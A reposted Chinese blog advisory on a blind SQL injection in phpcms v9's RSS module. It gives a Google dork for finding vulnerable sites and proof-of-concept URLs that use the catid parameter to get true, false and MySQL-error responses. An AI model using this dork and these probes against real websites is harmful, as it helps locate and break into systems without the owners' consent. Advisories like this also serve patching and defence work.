本文整理自网络,侵删。
影响版本:phpcms v9 blind
官方网站:http://www.phpcms.cn
漏洞类型:SQL注入
漏洞描述:phpcms v9 blind 参数过滤存在SQL注入漏洞。
google dork:inurl:"index.php?m=content+c=rss+catid=10"
exploit & p0c
[!] index.php?m=content&c=rss&catid=[valid catid]
Example p0c
[!] http://host/index.php?m=content&c=rss&catid=10 <= True
[!] http://host/index.php?m=content&c=rss&catid=-10 <= False
[+] http://host/index.php?m=content&c=rss&catid=5 <= show MySQL Error (table)
更多PHPCMS内容来自木庄网络博客
标签:PHPCMS
相关阅读 >>
phpcms系统设置镜像下载模式 如何设置phpcms镜像下载模式
phpcms 列表页中调用其下的所有子栏目(或特定的子栏目)的方法
phpcms缓存使用总结(memcached、eaccelerator、shm)
国内一些常用php的cms的nginx服务器的伪静态规则整理
phpcms v9自定义评论字段utf8_cmsyou修正版
更多相关阅读请进入《phpcms》频道 >>